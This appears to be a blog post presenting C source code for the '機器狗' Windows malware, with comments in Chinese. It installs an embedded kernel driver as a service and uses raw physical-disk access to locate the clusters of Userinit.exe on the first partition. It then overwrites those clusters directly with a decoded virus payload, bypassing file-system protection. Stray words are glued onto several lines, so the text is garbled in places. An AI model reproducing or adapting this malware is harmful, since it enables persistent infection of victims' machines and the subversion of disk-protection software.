機器狗源碼(C語言的)數據結構
// Test.cpp : 定義控制檯應用程序的入口點。
//
#include "stdafx.h"ide
//==============================================================================
#include <pshpack1.h>
typedef struct _PARTITION_ENTRY
{
UCHAR active; // 可否啓動標誌
UCHAR StartHead; // 該分區起始磁頭號
UCHAR StartSector; // 起始柱面號高2位:6位起始扇區號
UCHAR StartCylinder; // 起始柱面號低8位
UCHAR PartitionType; // 分區類型
UCHAR EndHead; // 該分區終止磁頭號
UCHAR EndSector; // 終止柱面號高2位:6位終止扇區號
UCHAR EndCylinder; // 終止柱面號低8位
ULONG StartLBA; // 起始扇區號
ULONG TotalSector; // 分區尺寸(總扇區數)
} PARTITION_ENTRY, *PPARTITION_ENTRY;指針
//==============================================================================
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;blog
//==============================================================================
typedef struct _BBR_SECTOR
{
USHORT JmpCode; // 2字節跳轉指令,跳轉到引導代碼
UCHAR NopCode; // 1字節nop指令,填充用,保證跳轉指令長3個字節
UCHAR OEMName[8]; // 8字節的OEMNameip
// 下面開始爲: BPB( BIOS Parameter Block )ci
USHORT BytesPerSector; // 每一個扇區的字節數 (512 1024 2048 4096)
UCHAR SectorsPerCluster; // 每一個簇的扇區數 ( 1 2 4 8 16 32 64 128 )二者相乘不能超過32K(簇最大大小)
USHORT ReservedSectors; // 從卷的第一個扇區開始的保留扇區數目,該值不能爲0,對於FAT12/FAT16,該值一般爲1,對於FAT32,典型值爲32
UCHAR NumberOfFATs; // 捲上FAT數據結構的數目,該值一般應爲2,[NTFS不使用NumberOfFATs字段,必須爲0]
USHORT RootEntries; // 對於FAT12/FAT16,該值表示32字節目錄項的數目,對於FAT32,該值必須爲0;[NTFS不使用]
USHORT NumberOfSectors16; // 該捲上的扇區總數,該字段能夠爲0,若是該字段爲0,則NumberOfSectors32不能爲0;對於FAT32,該字段必須爲0 [FAT32/NTFS不使用該字段]
UCHAR MediaDescriptor; // 介質類型
USHORT SectorsPerFAT16; // 該字段標識一個FAT結構佔有的扇區數(FAT12/FAT16),對於FAT32卷,該字段必須爲0;[FAT32/NTFS不使用該字段]
USHORT SectorsPerTrack; // 用於INT 0x13中斷的每一個磁道的扇區數
USHORT HeadsPerCylinder; // 用於INT 0x13中斷的每一個柱面的磁頭數
ULONG HiddenSectors; // 包含該FAT卷的分區以前的隱藏扇區數
ULONG NumberOfSectors32; // 該字段包含該捲上的全部扇區數目,對於FAT32,該字段不爲0;FAT12/FAT16可根據實際大小是否超過65536個扇區數決定是否採用該字段; [NTFS不使用該字段]資源
// 下面開始爲: EBPB ( Extended BIOS Parameter Block )源碼
ULONG SectorsPerFAT32; // 對於FAT32,該字段包含一個FAT的大小,而SectorsPerFAT16字段必須爲0;
} BBR_SECTOR, *PBBR_SECTOR;it
#include <poppack.h>io
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
//==============================================================================
#define STR_SYSFILE_PATH TEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#define STR_VIRFILE_PATH TEXT("%SystemRoot%\\System32\\Userinit.exe")
#define STR_DSKDEVICE_NAME TEXT("\\\\.\\PhysicalDrive0")
#define STR_HDDDEVICE_NAME TEXT("\\\\.\\PhysicalHardDisk0")
//==============================================================================
#define IOCTL_MYDEV_BASE 0xF000
#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)
//==============================================================================
DWORD InstallAndStartDriver(HMODULE ModuleHandle)
{
TCHAR filePath[MAX_PATH];
HANDLE fileHandle;
HRSRC hSysRes;
DWORD dwWritten;
DWORD dwSysLen;
PVOID lpSysBuf;
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(
(NULL == (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001)))
||
(0 == (dwSysLen = SizeofResource(ModuleHandle, hSysRes)))
||
(NULL == (lpSysBuf = LockResource(hSysRes)))
||
(0 == ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath)))
||
(INVALID_HANDLE_VALUE == (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)))
)
{
errCode = GetLastError();
goto FunExit00;
}
if(
!WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL)
||
!SetEndOfFile(fileHandle)
||
!FlushFileBuffers(fileHandle)
)
{
errCode = GetLastError();
}
CloseHandle(fileHandle);
if(ERROR_SUCCESS != errCode)
{
goto FunExit01;
}
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
if(NULL != (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
errCode = GetLastError();
goto FunExit02;
}
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_START)))
{
errCode = GetLastError();
goto FunExit02;
}
StartService(hService, 0, NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
DeleteFile(filePath);
FunExit00:
return errCode;
}
//==============================================================================
DWORD StopAndDeleteDriver(VOID)
{
TCHAR filePath[MAX_PATH];
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit00;
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath));
DeleteFile(filePath);
return errCode;
}
//==============================================================================
// 感染硬盤第一個分區的指定的文件
//
// 1)經過FSCTL_GET_RETRIEVAL_POINTERS獲取文件數據的分佈 信息
//
// 2)經過直接訪問硬盤(\\\\.\\PhysicalHardDisk0)的的MDR和第一個分區的引導扇區獲得分區參數來定位文件。
//
// 3)經過對比ReadFile讀取的文件數據和本身定位後直接 讀取所獲得的文件數據,肯定定位是否正確
//
// 入口參數:
// 要感染的文件名(完整路徑)
//
// Return value:
// Success -> NULL
// Failed -> 指向出錯信息的指針
//==============================================================================
DWORD WriteVirusToDisk(LPCTSTR VirusFile)
{
STARTING_VCN_INPUT_BUFFER iVcnBuf;
UCHAR oVcnBuf[272];
PRETRIEVAL_POINTERS_BUFFER lpVcnBuf;
DWORD dwVcnExtents;
LARGE_INTEGER startLcn;
PUCHAR lpClusterBuf;
DWORD dwClusterLen;
UCHAR dataBuf[512];
UCHAR diskBuf[512];
DWORD dataLen;
LARGE_INTEGER diskPos;
PPARTITION_ENTRY lpPartition;
ULONG dwPartitionStart;
ULONG dwPartitionType;
PBBR_SECTOR lpBootSector;
DWORD SectorsPerCluster;
HANDLE hHddDevice;
HANDLE hDskDevice;
HANDLE hVirusFile;
DWORD errCode = ERROR_SUCCESS;
if(INVALID_HANDLE_VALUE == (hHddDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit00;
}
//
if(INVALID_HANDLE_VALUE == (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL)))
{
errCode = GetLastError();
goto FunExit01;
}
iVcnBuf.StartingVcn.QuadPart = 0;
RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf));
if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRIEVAL_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf[0], sizeof(oVcnBuf), &dataLen, NULL))
{
errCode = GetLastError();
goto FunExit02;
}
lpVcnBuf = (PRETRIEVAL_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents = lpVcnBuf->ExtentCount;
startLcn = lpVcnBuf->Extents[0].Lcn;
if(!dwVcnExtents)
{
errCode = (ULONG)(-3); // 文件過小, 不能操做
goto FunExit02;
}
if(startLcn.QuadPart == -1)
{
errCode = (ULONG)(-4); // 該文件是壓縮文件, 不能操做
goto FunExit02;
}
ReadFile(hVirusFile, dataBuf, sizeof(dataBuf), &dataLen, NULL);
// 打開第一個物理硬盤
if(INVALID_HANDLE_VALUE == (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit02;
}
// 讀取硬盤第一個扇區(MBR)
SetFilePointer(hDskDevice, 0, NULL, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpPartition = &(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active != 0x80)
{
errCode = (ULONG)(-1); // 分區不是啓動分區
goto FunExit03;
}
dwPartitionType = lpPartition[0].PartitionType;
if(
dwPartitionType != PARTITION_TYPE_FAT32
&&
dwPartitionType != PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType != PARTITION_TYPE_NTFS
)
{
errCode = (ULONG)(-2); // 不支持的磁盤分區
goto FunExit03;
}
dwPartitionStart = lpPartition[0].StartLBA;
diskPos.QuadPart = dwPartitionStart * 512;
// 讀取啓動分區的第一個扇區(啓動扇區)
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpBootSector = (PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster = lpBootSector->SectorsPerCluster;
// 根據FAT32/NTFS計算Userinit的起始簇的偏移量
diskPos.QuadPart = dwPartitionStart;
diskPos.QuadPart+= lpBootSector->ReservedSectors;
if(dwPartitionType == PARTITION_TYPE_FAT32 || dwPartitionType == PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+= lpBootSector->NumberOfFATs * lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster;
diskPos.QuadPart*= 512;
// 檢查文件尋址
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf)))
{
errCode = (ULONG)(-5); // 尋址文件不成功
goto FunExit03;
}
// 分配緩衝
dwClusterLen = SectorsPerCluster*512;
lpClusterBuf = (PUCHAR)GlobalAlloc(GMEM_ZEROINIT, dwClusterLen); // 保存一個簇所要的緩衝
if(!lpClusterBuf)
{
errCode = GetLastError(); // 尋址文件不成功
goto FunExit03;
}
// 把Virus文件的數據從SYS文件資源段中解碼出來
if(!DeviceIoControl(
hVirusFile,
IOCTL_MYDEV_Fun_0xF01,
(PVOID)0x00401000, // 本執行文件代碼段的開始, 在C語言中我不會表達
0x73E, // 本執行文件代碼段的長度, 在C語言中我不會表達
lpClusterBuf,
dwClusterLen,
&dataLen,
NULL
))
{
errCode = GetLastError();
goto FunExit04;
}
// 寫Virus文件的數據到磁盤
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
WriteFile(hDskDevice, lpClusterBuf, dwClusterLen, &dataLen, NULL);
FlushFileBuffers(hDskDevice);
errCode = ERROR_SUCCESS;
FunExit04:
GlobalFree(lpClusterBuf);
FunExit03:
CloseHandle(hDskDevice);
FunExit02:
CloseHandle(hVirusFile);
FunExit01:
CloseHandle(hHddDevice);
FunExit00:
return errCode;
}
//============================================================================== int _tmain(int argc, _TCHAR* argv[]) { TCHAR filePath[MAX_PATH]; DWORD errCode; if(ERROR_SUCCESS != (errCode = InstallAndStartDriver(GetModuleHandleA(NULL)))) { MessageBox(NULL, TEXT("驅動程序的加載沒有成功,程序將沒法運行"), NULL, MB_ICONERROR); goto FunExit00; } ExpandEnvironmentStrings(STR_VIRFILE_PATH, &filePath[0], sizeof(filePath)); WriteVirusToDisk(filePath); StopAndDeleteDriver(); FunExit00: return 0; }